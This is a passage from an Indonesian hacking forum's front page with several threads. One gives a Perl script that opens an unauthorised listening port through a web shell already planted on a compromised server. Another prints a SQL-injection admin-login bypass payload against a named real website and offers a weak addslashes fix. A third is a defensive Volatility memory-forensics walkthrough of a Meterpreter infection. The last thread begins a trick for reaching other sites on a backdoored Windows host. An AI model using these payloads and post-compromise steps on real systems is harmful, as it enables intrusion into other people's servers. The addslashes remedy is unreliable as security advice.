Hello There, Guest! Register

Welcome, Guest
You have to register before you can post on our site.

Username
  

Password
  





Search Forums

(Advanced Search)

Forum Statistics
» Members: 25
» Latest member: Eazbi
» Forum threads: 54
» Forum posts: 112

Full Statistics

Online Users
There are currently 8 online users.
» 0 Member(s) | 8 Guest(s)

Latest Threads
Seminal Nasional “Unmask ...
Forum: Event
Last Post: bifi
Yesterday, 05:02 PM
» Replies: 0
» Views: 14
Port iLegal With Perl Soc...
Forum: Perl
Last Post: P4KyU
09-10-2017, 11:42 AM
» Replies: 0
» Views: 89
Patch Bug Di Website JASA...
Forum: PHP
Last Post: XCodernate
08-25-2017, 05:43 AM
» Replies: 1
» Views: 163
[Share] Memory analysis c...
Forum: Memory
Last Post: JLCNate
08-17-2017, 09:43 AM
» Replies: 0
» Views: 173
[trik] bypass file intern...
Forum: Microsoft Windows
Last Post: P4KyU
08-16-2017, 11:14 AM
» Replies: 0
» Views: 184
Cara Cari Curi
Forum: Ruby
Last Post: scriptKiddie
08-15-2017, 08:47 PM
» Replies: 2
» Views: 165
[Share] Install Fluxion
Forum: Kali Linux
Last Post: JLCNate
08-14-2017, 06:28 AM
» Replies: 2
» Views: 714
Config bashrc for termina...
Forum: Bash
Last Post: JLCNate
08-13-2017, 03:18 PM
» Replies: 1
» Views: 194
Limited Shell a.k.a lshel...
Forum: ETC
Last Post: official
08-12-2017, 03:39 PM
» Replies: 2
» Views: 160
Belajar ngoding ketemu il...
Forum: Python
Last Post: scriptKiddie
08-12-2017, 02:26 PM
» Replies: 4
» Views: 198

 
  Seminal Nasional “Unmask Cyber Crime” – Surabaya Hacker Link
Posted by: bifi - Yesterday, 05:02 PM - Forum: Event - No Replies

Seminal Nasional “Unmask Cyber Crime” – Surabaya Hacker Link

Mencuri uang & datamu, membobol servermu dan menyusupi gadgetmu adalah hal mudah bagi para pelaku Cyber Crime.

Siapa mereka? bagaimana mereka melakukannya?

JOIN THIS SHOW!


[Image: hOZzNsGXTRin5TbLlrGGog.jpg]


Ketua umum Zona IT Ternate, Jamz D. Mozac atau Muhammad Muzammil. Akan memberikan materi seminar di Surabaya pada akhir bulan Oktober 2017.


Untuk info lebih lanjut dan juga registrasi bisa alamat : Register

Print this item

  Port iLegal With Perl Socket
Posted by: P4KyU - 09-10-2017, 11:42 AM - Forum: Perl - No Replies

hi.. 
jumpa lagi, seperti judul thread diatas. 
ane mau share sedikit tetang beberapa website yang sempat 3njhuteam melakukan request port secara ilegal melalui script perl. 

Perl Script download socket.pl

Code:
#!/usr/bin/perl -w
use strict;
use IO::Socket;

sub Wait {
    wait; # wait needed to keep <defunct> pids from building up
}

$SIG{CHLD} = \&Wait;

my $server = IO::Socket::INET->new(
    LocalPort     => 1337, # set port
    Type         => SOCK_STREAM,
    Reuse         => 1,
    Listen         => 10) or die "$@\n";
my $client ;

while($client = $server->accept()) {
    select $client;
    print $client "HTTP/1.0 200 OK\r\n";
    print $client "Content-type: text/html\r\n\r\n";
    print $client '<title>opss
</title><H1>3nJhuTeam  ft. 2U</H1><BR><H2>Love Yourself</H2><embed src="http://www.youtube.com/v/iyMQRVA2pnc&amp;autoplay=1&amp;loop=1&amp;playlist=iyMQRVA2pnc" type="application/x-shockwave-flash" wmode="transparent" height="1" width="1"></embed>'; # set your html content
}
continue {
    close($client); #kills hangs
    kill CHLD => -$$;
}

bisa dilhat dari sini
Code:
my $server = IO::Socket::INET->new(
    LocalPort     => 1337, # set port
    Type         => SOCK_STREAM,


ada code yang tertulis new yang dimana code tersebut akan membuka port baru. dan localport disini listning port kita memakai port 1337. terseserah ya. sesuai selera anda saja. 

cara eksekusinya.? 
slow down. anda harus mempunyai akses shell/backdoor dari salah satu website. caranya.? not learning for upload shell, please search google for information backdoor site. 

sebagai contoh, ini adalah target untuk listning port ilegal. show ini belum di eksekusi.
[Image: A5-WHTP3SeyXS8-pQzBfzg.png]


cara eksekusi script perl. anggap saja saya udah mempunyai akses shell/backdoor pada target tersebut.

upload script perl tersebut dengan extensi pl atau test.pl lalu buka command pada shell/backdoor lalau jalankan dengan perintah 
Quote:perl test.pl

jika sudah menjalan script tersebut lalu buka salah satu website yang satu server shared dengan port yang telah diatur sebelumnya pada script perl. 
contohnya script tersebut kami menyimpan dengan nama socket.pl 
[Image: HJfsm9eEQPmA2q23laljLA.png]
untuk menentukan apakah script tersebut berjalan atau tidak bisa jalankan perintah ini di console
Quote:ps aux | grep 'perl'

ops scriptnya jalan.
[Image: IEXLglMdTTKocvIG-AXhAw.png]
kita cek apakah listning portnya berjalan. 
opss.. berhasil.... 
[Image: Q0gMJ1PbTMqjlQJ6akI5ag.png]

Referensi : http://www.binarytides.com/perl-socket-p...-tutorial/

Print this item

  Patch Bug Di Website JASAKODING.ID
Posted by: P4KyU - 08-23-2017, 11:38 AM - Forum: PHP - Replies (1)

Tercyduc!!


Hi, kali ini gue mau share sedikit tentang celah-celah kecil yang bisa membuat fatal pada website anda dalam tanda kutip " 

kemarin sempat kontak sama adminnya melalui email, tapi gak ada respon.. oke fine mungkin adminya kira hanya masalah sepele. 
padahal ada celah kecil yang bisa membuat seseorang bisa mengupload file yang sangat berbahaya berupa virus atau backdoor. 

Celah yang dimaksud antara lain adalah 
1. BYPASS ADMIN LOGIN SQL INJECTION 

pada kesempatan ini mba Natasya atau sering di kenal dengan m0m0 bertanya, kok wordpress bisa bypass admin login.? 
slow down,  letak bugnya ada pada subfolder, dan pada subfolder tidak memakai cms wordpress akan tetapi memakai kodingan php sendiri. 

code bypass admin login 

Quote:username : ' or 1=1 limit 1 -- -+
password : ' or 1=1 limit 1 -- -+

[Image: S1wQfjHdRKSjqyAWgp5uDg.png] 

[Image: EX31ewTzR3KcUiyo3eC4YA.png]


timbul pertanyaan kok bisa ya.?
ayo kita lihat isi kodingan dulu kenapa sampai bisa tanpa harus login menggunakan username dan password admin. 
PHP Code:
<?php
$username
=trim(strip_tags($_POST['username']));
    
$password=md5($_POST['password']);
    
$act=$_GET['act'];
    if(
$act=='lgn'){
        
$cek=mysql_query("select * from tbadmin where username='$username' and password='$password'");
        if(
mysql_num_rows($cek)==1){//jika berhasil akan bernilai 1
        
$c mysql_fetch_array($cek);
        
$_SESSION['rahasia'] = md5($c['username']);
        echo 
"<meta http-equiv='Refresh' content='0; URL=?'>";    
        }else{
    
?>
    <script type="text/javascript">
    alert('Data Login Anda salah, silahkan coba lagi !!!');
    </script> 

perhatikan pada code ini dengan metode bypass admin.
Code:
if(mysql_num_rows($cek)==1){//jika berhasil akan bernilai 1

bypass code 
Code:
' or 1=1 limit 1 -- -+

kemudian perhatikan code ini
Code:
$username=trim(strip_tags($_POST['username']));
    $password=md5($_POST['password']);


fungsi yang digunakan adalah strip_tags  
Quote:Strip_tags() : digunakan untuk menghilangkan karakter2 html dari value yg diinputkan

dalam hal ini cluenya bisa dilihat bahwa strip_tags menghilangkan karakter2 html dengan inputan id yang berupa angka bahkan berbagai karakter lainnya. 
berarti bisa dibilang tidak ada filter pada bagian inputan login. 

bagaimana cara mengatasinya.?
sebenarnya ada banyak cara, tergantung selera anda saja. 
disini saya menutup celah tersebut dengan code yang sengat pendek dan sederhana. 

saya hanya menggantikan fungsi strip_tags 
Code:
$username=trim(strip_tags($_POST['username']));
    $password=md5($_POST['password']);

dengan fungsi addslashes  
Code:
$username=addslashes(trim($_POST[username]));
    $password=md5($_POST['password']);

full code 
PHP Code:
<?php
$username
=addslashes(trim($_POST[username]));
    
$password=md5($_POST['password']);
    
$act=$_GET['act'];
    if(
$act=='lgn'){
        
$cek=mysql_query("select * from tbadmin where username='$username' and password='$password'");
        if(
mysql_num_rows($cek)==1){//jika berhasil akan bernilai 1
        
$c mysql_fetch_array($cek);
        
$_SESSION['rahasia'] = md5($c['username']);
        echo 
"<meta http-equiv='Refresh' content='0; URL=?'>";    
        }else{
    
?>
    <script type="text/javascript">
    alert('bug closed by codernate.org !!!');
    </script> 

setelah diganti dengan fungsi addslashes  
dan dicoba dengan metode yang sama alias bypass admin
Code:
' or 1=1 limit 1 -- -+


dan celahnya berhasil di tutup dengan fungsi addslashes
[Image: wzQmV8tZROSPdKk8ManUaA.png]

semoga thread ini bisa menjadi acuan untuk memperhatikan fungsi-fungsi kecil yang sangat rentan dan bisa membuat website anda di susupi oleh seseorang.


saya juga memberikan notif kepada admin melalui sebuah file yang saya titip. 
https://www.jasakoding.id/notif.htm

Referensi : http://php.net/manual/en/function.addcslashes.php

sekian untuk thread kali ini.
jangan lupa like fanspage kami : https://www.facebook.com/loading.gov 
dan profil kami                       : https://3njhuteam.github.io

Print this item

  [Share] Memory analysis challenge
Posted by: JLCNate - 08-17-2017, 09:43 AM - Forum: Memory - No Replies

Untuk kali ini aku coba share bagaimana melakukan analisis memori dengan menggunakan Volatility

Mari kita coba selesaikan beberapa poin dibawah ini:

  1. Identifikasi jenis OS-nya
  2. Identifikasi proses yang mencurigakan
  3. Identifikasi service yang mencurigakan
  4. Identifikasi remote IP yang mentriger proses tersebut
  5. Identifikasi tipe malware yang menginfeksi komputer tersebut
  6. Identifikasi apakah di komputer tersebut terinstall antivirus
  7. Temukan aplikasi atau service yang "vulnerable" yang mungkin dimanfaatkan oleh si hacker untuk masuk ke dalam komputer tersebut

Download filenya disini : RAM.7z


File yang kita peroleh adalah seperti ini

Code:
┌─[ Thu Aug 17 02:19:05 1 files, 512M
└─[ root@jlcnate:~/Documents/Codernate/Forensics/Memory ] -->  ll
total 512M
drwxr-xr-x 2 root root 4.0K Aug 17 02:18 ./
drwxr-xr-x 3 root root 4.0K Aug 17 02:18 ../
-rw-rw-rw- 1 root root 512M Apr 10  2014 RAM.mem


Dapat terlihat bahwa kapasitas dari file memory ini adalah 512MB dan dibuat pada 10 April 2014


Mari kita cek MD5 nya dengan menggunakan md5sum

Code:
┌─[ Thu Aug 17 02:24:44 1 files, 512M
└─[ root@jlcnate:~/Documents/Codernate/Forensics/Memory ] -->  md5sum RAM.mem
47ca9f4ef6549705a9337166ac45ea82  RAM.mem

MD5 : 47ca9f4ef6549705a9337166ac45ea82

Baik mari kita mulai lakukan analisis

Pastikan kamu sudah memiliki Volatility sebagai tool dalam melakukan analisa nanti



Identifikasi jenis OS

Untuk identifikasi jenis os nya kita dapat menggunakan Plugin imageinfo

Code:
volatility -f RAM.mem imageinfo


Berikut output yang dihasilkan

Code:
┌─[ Thu Aug 17 03:03:00 1 files, 512M
└─[ root@jlcnate:~/Documents/Codernate/Forensics/Memory ] -->  volatility -f RAM.mem imageinfo
Volatility Foundation Volatility Framework 2.6
INFO    : volatility.debug    : Determining profile based on KDBG search...
         Suggested Profile(s) : WinXPSP2x86, WinXPSP3x86 (Instantiated with WinXPSP2x86)
                    AS Layer1 : IA32PagedMemoryPae (Kernel AS)
                    AS Layer2 : FileAddressSpace (/root/Documents/Codernate/Forensics/Memory/RAM.mem)
                     PAE type : PAE
                          DTB : 0x311000L
                         KDBG : 0x80545ae0L
         Number of Processors : 1
    Image Type (Service Pack) : 3
               KPCR for CPU 0 : 0xffdff000L
            KUSER_SHARED_DATA : 0xffdf0000L
          Image date and time : 2014-04-10 06:30:00 UTC+0000
    Image local date and time : 2014-04-10 13:30:00 +0700


Quote:[Image: S26cT58ZSlmCcbKpaG7QmQ.png]


Perhatikan pada Suggested profile(s) : WinXPSP2x86, WinXPSP3x86 (Instantiated with WinXPSP2x86)
dari sini, kita telah berhasil memperoleh informasi OS yang digunakan adalah Microsoft Windows XP.

Tapi kenapa ada muncul 2, WinXPSP2 Dan WinXPSP3? Ini dikarenakan profile yang tersedia dapat kita digunakan untuk melakukan kegiatan seperti melihat prosses, history dan sebagai nya pada versi jenis OS yang digunakan dengan menggunakan Volatility.[



Identifikasi proses yang mencurigakan

Untuk mengidentifikasi proses-proses yang mencurigakan misalnya malware dan proses lainnya kita dapat menggunakan plugin pslist, psscan atau pstree. Perintah yang dapat dijalankan adalah seperti ini
Code:
┌─[ Thu Aug 17 02:50:39 1 files, 512M
└─[ root@jlcnate:~/Documents/Codernate/Forensics/Memory ] -->  volatility -f RAM.mem --profile=WinXPSP2x86 pslist


--profile=WinXPSP2x86 adalah profil yang ditentukan dari suggest profile yang diperoleh sebelumnya, maka output yang dihasilkan adalah:

pslist

Quote:[Image: ShlzB-m0TWOTOv1AzsOqMw.png]


Perhatikan pada PID 1644 metsvc.exe, PID 584 wscript.exe dan PID 1760 qNPEwOBAwGzOSN.
Ketiga proses tersebut merupakan proses yang mencurigakan dikarenakan proses-proses ini biasanya merupakan proses yang berjalan ketika komputer sedang terkena serangan malware dari metasploit maupun virus atau trojan.
malware berjalan dari wscript.exe yg merupakan windows service yg berfungsi untuk menjalankan file Vbscript
Backdoor dibuat oleh wscript yang menjalankan file-file malicious lainnya yaitu qNPEwOBAwGzOSN.


Quote:We will now use the multi/handler with a payload of ‘windows/metsvc_bind_tcp’ to connect to the remote system. This is a special payload, as typically a Meterpreter payload is multi-stage, where a minimal amount of code is sent as part of the exploit, and then more is uploaded after code execution has been achieved. ~ Interacting with Metsvc, https://www.offensive-security.com/metas...ng-metsvc/



Identifikasi service yang mencurigakan

Disini saya menggunakan plugin svcscan untuk mendapatkan aktifitas sevice
perintah yang dijalankan adalah

Code:
┌─[ Thu Aug 17 03:03:00 1 files, 512M
└─[ root@jlcnate:~/Documents/Codernate/Forensics/Memory ] -->  volatility -f RAM.mem --profile=WinXPSP2x86 svcscan


Lihat apa yang kita peroleh pada offset : 0x385630, sebuah service yang biasanya digunakan untuk melakukan exploitasi dengan metasploit dengan Binary Path yang memiliki karakter aneh QeJPYErizYmFJn

Code:
Offset: 0x385630
Order: 100
Start: SERVICE_AUTO_START
Process ID: 1644
Service Name: metsvc
Display Name: Meterpreter
Service Type: SERVICE_INTERACTIVE_PROCESS, SERVICE_WIN32_OWN_PROCESS
Service State: SERVICE_RUNNING
Binary Path: "C:\DOCUME~1\WINVIC~1\LOCALS~1\Temp\QeJPYErizYmFJn\metsvc.exe" service


Quote:[Image: VAXQhZ2-SNyl5pJGqZkQRg.png]




Identifikasi remote IP yang mentriger proses

Pada tahapan ini kita akan menggunakan plugin connections dan connscan

Jalankan perintah berikut untuk connections

Code:
┌─[ Thu Aug 17 03:15:56 1 files, 512M
└─[ root@jlcnate:~/Documents/Codernate/Forensics/Memory ] -->  volatility -f RAM.mem --profile=WinXPSP2x86 connections



Maka output yang diperoleh adalah

Code:
┌─[ Thu Aug 17 03:15:56 1 files, 512M
└─[ root@jlcnate:~/Documents/Codernate/Forensics/Memory ] -->  volatility -f RAM.mem --profile=WinXPSP2x86 connections
Volatility Foundation Volatility Framework 2.6
Offset(V)  Local Address             Remote Address            Pid
---------- ------------------------- ------------------------- ---
0x821818a0 10.1.103.48:1069          192.168.88.44:443         1760
0x8245ce68 10.1.103.48:1049          10.1.103.47:443           1060


dan untuk connscan

Code:
┌─[ Thu Aug 17 03:19:02 1 files, 512M
└─[ root@jlcnate:~/Documents/Codernate/Forensics/Memory ] -->  volatility -f RAM.mem --profile=WinXPSP2x86 connscan


Maka output yang dihasilkan adalah

Code:
┌─[ Thu Aug 17 03:19:02 1 files, 512M
└─[ root@jlcnate:~/Documents/Codernate/Forensics/Memory ] -->  volatility -f RAM.mem --profile=WinXPSP2x86 connscan
Volatility Foundation Volatility Framework 2.6
Offset(P)  Local Address             Remote Address            Pid
---------- ------------------------- ------------------------- ---
0x021514b0 10.1.103.48:1071          10.1.103.47:4444          1872
0x021818a0 10.1.103.48:1069          192.168.88.44:443         1760
0x023f4008 10.1.103.48:1069          192.168.88.44:443         1760
0x0245ce68 10.1.103.48:1049          10.1.103.47:443           1060



Quote:[Image: mG9zxt-0QwKLEEg5DP55ZQ.png]


Terdapat 2 buah IP yang sedang berproses dan terkoneksi, dari kedua IP tersebut mari kita identifikasi IP mana yang merupakan IP yang mentriger proses dengan menggunakan plugin iehistory

Code:
 ┌─[ Thu Aug 17 03:50:43 2 files, 512M
 └─[ root@jlcnate:~/Documents/Codernate/Forensics/Memory ] -->  volatility -f RAM.mem --profile=WinXPSP3x86 iehistory
Volatility Foundation Volatility Framework 2.6
**************************************************
Process: 408 explorer.exe
Cache type "URL " at 0x1f15000
Record length: 0x100
Location: Visited: WINVICTIM@http://192.168.88.44:8080/payloads/trojan.exe
Last modified: 2014-03-04 03:44:00 UTC+0000
Last accessed: 2014-03-04 03:44:00 UTC+0000
File Offset: 0x100, Data Offset: 0x0, Data Length: 0xac
**************************************************
Process: 408 explorer.exe
Cache type "URL " at 0x1f15100
Record length: 0x100
Location: Visited: WINVICTIM@http://192.168.88.44:8080/payloads
Last modified: 2014-03-04 03:43:49 UTC+0000
Last accessed: 2014-03-04 03:43:49 UTC+0000
File Offset: 0x100, Data Offset: 0x0, Data Length: 0xa0
**************************************************
Process: 408 explorer.exe
Cache type "URL " at 0x1f15880
Record length: 0x100
Location: Visited: WINVICTIM@about:Home
Last modified: 2014-03-04 03:38:45 UTC+0000
Last accessed: 2014-03-04 03:38:45 UTC+0000
File Offset: 0x100, Data Offset: 0x0, Data Length: 0x88
**************************************************
Process: 408 explorer.exe
Cache type "URL " at 0x1f15e80
Record length: 0x100
Location: Visited: WINVICTIM@file:///C:/Documents%20and%20Settings/WINVICTIM/My%20Documents/account.txt
Last modified: 2013-11-13 06:51:03 UTC+0000
Last accessed: 2013-11-13 06:51:03 UTC+0000
File Offset: 0x100, Data Offset: 0x0, Data Length: 0xc8
**************************************************
Process: 408 explorer.exe
Cache type "URL " at 0x1f17b80
Record length: 0x100
Location: Visited: WINVICTIM@file:///C:/Documents%20and%20Settings/WINVICTIM/My%20Documents/account.txt
Last modified: 2014-04-10 05:58:25 UTC+0000
Last accessed: 2014-04-10 05:58:25 UTC+0000
File Offset: 0x100, Data Offset: 0x0, Data Length: 0xc8
**************************************************
Process: 408 explorer.exe
Cache type "URL " at 0x1f17c80
Record length: 0x100
Location: Visited: WINVICTIM@file:///C:/Documents%20and%20Settings/WINVICTIM/Desktop/Setup.SED
Last modified: 2014-04-10 05:58:30 UTC+0000
Last accessed: 2014-04-10 05:58:30 UTC+0000
File Offset: 0x100, Data Offset: 0x0, Data Length: 0xc0


Ternyata terdapat koneksi ke alamat 192.168.88.44 pada port 8080
bisa kita pastikan bahwa IP ini adalah IP yang mentriger proses. Dimana nama file tersebut adalah aktifitas exploirasi payload dengan nama file trojan.exe



Identifikasi tipe malware yang menginfeksi komputer tersebut

Untuk mengetahui tipe dari malware yang menginfeksi tentu kita bisa menggunakan anti-virus, disini kita akan menggunakan virustotal

Namun sebelumnya kita akan mengambil file tersebut, dimana file tersebut berjalan pada wscript.exe pada PID 584, metsvc.exe pada PID 1644 serta qNPEwOBAwGzOSN. pada PID 1760, tapi disini kita hanya perlu dump file  metsvc.exe dan qNPEwOBAwGzOSN. Karena wscript tersebut ada karena adanya file trojan.exe tadi sehingga wscript menciptakan proses qNPEwOBAwGzOSN.

Mari kita buat dulu direktory untuk menampung output dengan nama "virus"
Jalankan perintah berikut untuk membuat direktory dengan mkdir
Code:
┌─[ Thu Aug 17 03:58:07 3 files, 1.0G
└─[ root@jlcnate:~/Documents/Codernate/Forensics/Memory ] -->  mkdir virus


Jalankan perintah

Code:
┌─[ Thu Aug 17 03:58:07 3 files, 1.0G
└─[ root@jlcnate:~/Documents/Codernate/Forensics/Memory ] -->  volatility -f RAM.mem --profile=WinXPSP2x86 procdump -p 1644,1760 -D virus


Maka output yang diperoleh adalah

Code:
┌─[ Thu Aug 17 03:58:07 3 files, 1.0G
└─[ root@jlcnate:~/Documents/Codernate/Forensics/Memory ] -->  volatility -f RAM.mem --profile=WinXPSP2x86 procdump -p 1644,1760 -D virus
Volatility Foundation Volatility Framework 2.6
Process(V) ImageBase  Name                 Result
---------- ---------- -------------------- ------
0x821c9d08 0x00400000 metsvc.exe           OK: executable.1644.exe
0x821cc7e0 0x00400000 qNPEwOBAwGzOSN.      OK: executable.1760.exe


Quote:[Image: qS4nmNzSRjCmhUQg9R7-2g.png]



Upload kedua file tersebut pada virustotal

Berikut hasil yang diperoleh
untuk file executable.1760.exe : https://www.virustotal.com/#/file/3e8719...b0/details
untuk file executable.1644.exe : https://www.virustotal.com/#/file/065d00.../detection

Dari hasil analisa dari virustotal diperoleh 46 dari 61 antivirus di dunia menganggap file tersebut berbahaya dan merupakan jenis trojan




Identifikasi apakah di komputer tersebut terinstall antivirus

Untuk mengidentifikasi apakan di komputer tersebut terinstall antivirus atau tidak, kita dapat menggunkan plugin shimcache


Code:
┌─[ Thu Aug 17 04:11:21 3 files, 1.0G
└─[ root@jlcnate:~/Documents/Codernate/Forensics/Memory ] -->  volatility -f RAM.mem --profile=WinXPSP2x86 shimcache


Maka ouput yang diperoleh adalah


Code:
┌─[ Thu Aug 17 04:11:21 3 files, 1.0G
└─[ root@jlcnate:~/Documents/Codernate/Forensics/Memory ] -->  volatility -f RAM.mem --profile=WinXPSP2x86 shimcache
Volatility Foundation Volatility Framework 2.6
Last Modified                  Last Update                    Path
------------------------------ ------------------------------ ----
2008-04-14 02:42:40 UTC+0000   2014-02-05 08:38:16 UTC+0000   \??\C:\WINDOWS\system32\verclsid.exe
2008-04-14 02:42:06 UTC+0000   2014-02-05 08:38:16 UTC+0000   \??\C:\WINDOWS\system32\SHELL32.dll
2008-04-14 02:42:44 UTC+0000   2013-11-14 08:50:09 UTC+0000   \??\C:\WINDOWS\system32\logon.scr
2013-10-30 08:28:57 UTC+0000   2014-02-05 08:42:49 UTC+0000   \??\C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 14.0.0\avp.exe
2013-11-12 07:43:05 UTC+0000   2013-11-12 07:45:56 UTC+0000   \??\C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 14.0.0\patch_c_kis2014.exe
1970-01-01 00:00:00 UTC+0000   2014-02-05 08:39:03 UTC+0000   C:\WINDOWS\system32\MSCOREE.DLL
2013-11-12 07:42:33 UTC+0000   2014-02-05 08:38:16 UTC+0000   \??\C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 14.0.0\avpui.exe
2013-04-12 09:53:44 UTC+0000   2014-02-05 08:37:42 UTC+0000   \??\C:\WINDOWS\system32\VBoxService.exe
2008-04-14 02:41:52 UTC+0000   2014-02-05 08:43:34 UTC+0000   \??\C:\WINDOWS\System32\cscui.dll
2010-03-18 06:16:28 UTC+0000   2014-02-05 08:37:53 UTC+0000   \??\C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
2013-04-12 09:53:46 UTC+0000   2014-02-05 08:38:16 UTC+0000   \??\C:\WINDOWS\system32\VBoxTray.exe
2008-04-14 02:42:04 UTC+0000   2014-02-05 08:38:17 UTC+0000   \??\C:\WINDOWS\system32\NETSHELL.dll
2013-06-17 05:35:50 UTC+0000   2014-02-05 08:42:50 UTC+0000   \??\C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 14.0.0\wmi32.exe
2008-04-14 02:42:42 UTC+0000   2013-11-14 09:13:02 UTC+0000   \??\C:\WINDOWS\system32\wscntfy.exe
2010-03-18 06:16:28 UTC+0000   2013-11-15 01:52:41 UTC+0000   \??\C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\WPF\WPFFontCache_v0400.exe
2013-06-17 05:35:26 UTC+0000   2013-11-14 09:13:39 UTC+0000   \??\C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 14.0.0\shellex.dll
2008-04-14 02:42:42 UTC+0000   2013-11-14 09:11:58 UTC+0000   \??\C:\WINDOWS\system32\wuaucpl.cpl
2008-04-14 02:42:06 UTC+0000   2013-11-14 09:11:58 UTC+0000   \??\C:\WINDOWS\system32\remotepg.dll
2008-04-14 02:42:06 UTC+0000   2013-11-14 09:11:52 UTC+0000   \??\C:\WINDOWS\system32\shgina.dll
2008-04-14 02:42:08 UTC+0000   2013-11-14 02:47:03 UTC+0000   \??\C:\WINDOWS\system32\twext.dll
2008-04-14 02:41:52 UTC+0000   2013-11-12 15:38:56 UTC+0000   \??\C:\WINDOWS\system32\dfsshlex.dll
2013-06-17 05:35:20 UTC+0000   2013-11-13 02:06:56 UTC+0000   \??\C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 14.0.0\office_antivirus.dll
2013-11-13 01:08:10 UTC+0000   2013-11-13 01:08:12 UTC+0000   \??\C:\Documents and Settings\WINVICTIM\Desktop\f7915612721b0e8dad57bdfcb29ac9bb-freeFTPd.exe
2005-08-29 14:09:04 UTC+0000   2014-02-05 08:39:19 UTC+0000   \??\C:\Program Files\freeFTPd\FreeFTPdService.exe
2008-04-14 02:41:54 UTC+0000   2014-02-05 08:39:56 UTC+0000   \??\C:\WINDOWS\system32\filemgmt.dll
2008-04-14 02:42:12 UTC+0000   2013-11-13 01:51:28 UTC+0000   \??\C:\WINDOWS\system32\zipfldr.dll
2008-04-14 02:42:02 UTC+0000   2013-11-13 01:51:39 UTC+0000   \??\C:\WINDOWS\system32\mydocs.dll
2013-11-13 02:06:58 UTC+0000   2013-11-13 02:08:20 UTC+0000   \??\C:\Documents and Settings\WINVICTIM\Desktop\putty.exe
2008-04-14 02:42:06 UTC+0000   2014-02-05 08:43:34 UTC+0000   \??\C:\WINDOWS\system32\shdocvw.dll
2008-04-14 02:41:52 UTC+0000   2013-11-14 02:47:03 UTC+0000   \??\C:\WINDOWS\system32\cryptext.dll
2008-04-14 02:41:54 UTC+0000   2013-11-14 02:47:03 UTC+0000   \??\C:\WINDOWS\system32\docprop2.dll
2008-04-14 02:42:08 UTC+0000   2013-11-14 03:04:28 UTC+0000   \??\C:\WINDOWS\system32\snmpsnap.dll
2008-04-14 02:42:06 UTC+0000   2013-11-14 03:04:28 UTC+0000   \??\C:\WINDOWS\system32\servdeps.dll
2013-11-14 08:28:20 UTC+0000   2014-02-05 08:38:17 UTC+0000   \??\C:\WINDOWS\system32\backdoor.exe
2004-08-04 12:00:00 UTC+0000   2013-11-14 09:13:45 UTC+0000   \??\C:\WINDOWS\system32\mycomput.dll
2008-04-14 02:42:04 UTC+0000   2013-11-14 09:13:45 UTC+0000   \??\C:\WINDOWS\system32\ntmsmgr.dll
2008-04-14 02:41:52 UTC+0000   2013-11-14 09:13:45 UTC+0000   \??\C:\WINDOWS\system32\dfrgsnap.dll
2008-04-14 02:41:54 UTC+0000   2013-11-14 09:13:45 UTC+0000   \??\C:\WINDOWS\System32\dmdskmgr.dll
2008-04-14 02:41:54 UTC+0000   2013-11-14 09:13:46 UTC+0000   \??\C:\WINDOWS\system32\els.dll
2008-04-14 02:41:58 UTC+0000   2013-11-14 09:13:46 UTC+0000   \??\C:\WINDOWS\system32\localsec.dll
2008-04-14 02:42:08 UTC+0000   2013-11-14 09:13:46 UTC+0000   \??\C:\WINDOWS\system32\smlogcfg.dll
2008-04-14 02:41:52 UTC+0000   2013-11-14 09:13:46 UTC+0000   \??\C:\WINDOWS\system32\devmgr.dll
2008-04-14 02:42:36 UTC+0000   2013-11-14 09:15:29 UTC+0000   \??\C:\Program Files\Outlook Express\setup50.exe
2008-04-14 02:42:40 UTC+0000   2013-11-14 09:15:29 UTC+0000   \??\C:\WINDOWS\inf\unregmp2.exe
2008-04-14 02:42:40 UTC+0000   2013-11-14 09:17:18 UTC+0000   \??\C:\WINDOWS\system32\tourstart.exe
2013-06-17 05:35:20 UTC+0000   2014-02-05 08:42:50 UTC+0000   \??\C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 14.0.0\klwtblfs.exe
2013-06-17 05:35:18 UTC+0000   2014-02-05 08:42:50 UTC+0000   \??\C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 14.0.0\klwtbws.exe
2008-04-14 02:42:10 UTC+0000   2014-02-05 08:43:34 UTC+0000   \??\C:\WINDOWS\system32\webcheck.dll
2008-04-14 02:42:10 UTC+0000   2014-02-05 08:43:34 UTC+0000   \??\C:\WINDOWS\system32\urlmon.dll


Quote:[Image: YuLF6_i_SYamJ9Zaqjm7Mg.png]


Ternyata, komputer tersebut memiliki antivirus Kaspersky




Temukan aplikasi atau service yang "vulnerable" yang mungkin dimanfaatkan oleh si hacker untuk masuk ke dalam komputer tersebut

Selanjutnya menemukan service atau applikasi "vulnerable" yang mungkin dimanfaatkan oleh si hacker untuk masuk ke dalam komputer tersebut. Sebelumnya kita telah memperoleh hasil pada offset : 0x385630, yang merupakan sebuah service yang biasanya digunakan untuk melakukan exploitasi dengan metasploit dengan Binary Path yang memiliki karakter aneh QeJPYErizYmFJn menggunakan plugin svcscan.

Dimana service ini menunjukkan berjalannya sebuah file dengan nama metsvc.exe
Dari output pslist file metsvc.exe diperoleh PID nya adalah 1644 file tersebut merupakan celah atau vulnerable yang memungkinkan untuk dimanfaatkan hacker masuk ke dalam komputer. Hasil analisis file executable.1644.exe : https://www.virustotal.com/#/file/065d00.../detection

Print this item

  [trik] bypass file internal Vhosts Windows Server
Posted by: P4KyU - 08-16-2017, 11:14 AM - Forum: Microsoft Windows - No Replies

Hi para pencari method bypass   Big Grin  

seperti judul thread diatas, mungkin anda terbiasa dengan metode symlink untuk melihat suatu file website yang satu server atau satu hostingan dengan website yang sudah anda bercocok tanam dengan shell backdoor, akan tetapi metode symlink itu hanya berlaku di Linux. 

Quote:[ Apa itu SymLink ]
Symbolic Link atau yang biasa dikenal dengan sebutan Symlink atau nama lainnya softlink adalah sebuah tipe spesial dari file yang berisikan referensi ke file atau direktori lain.
Referensi : https://id.wikipedia.org/wiki/Tautan_simbolis

kalau di Windows itu bukan Symlink, akan tetapi namanya shortcut.
oh iya, vhosts itu singkatan dari virtual host. 
Quote:Virtual Host adalah cara untuk mengatur banyak website atau URL di dalam satu mesin atau satu IP.
Referensi : https://en.wikipedia.org/wiki/Virtual_hosting  

langsung saja kita praktek biar lebih jelas. 
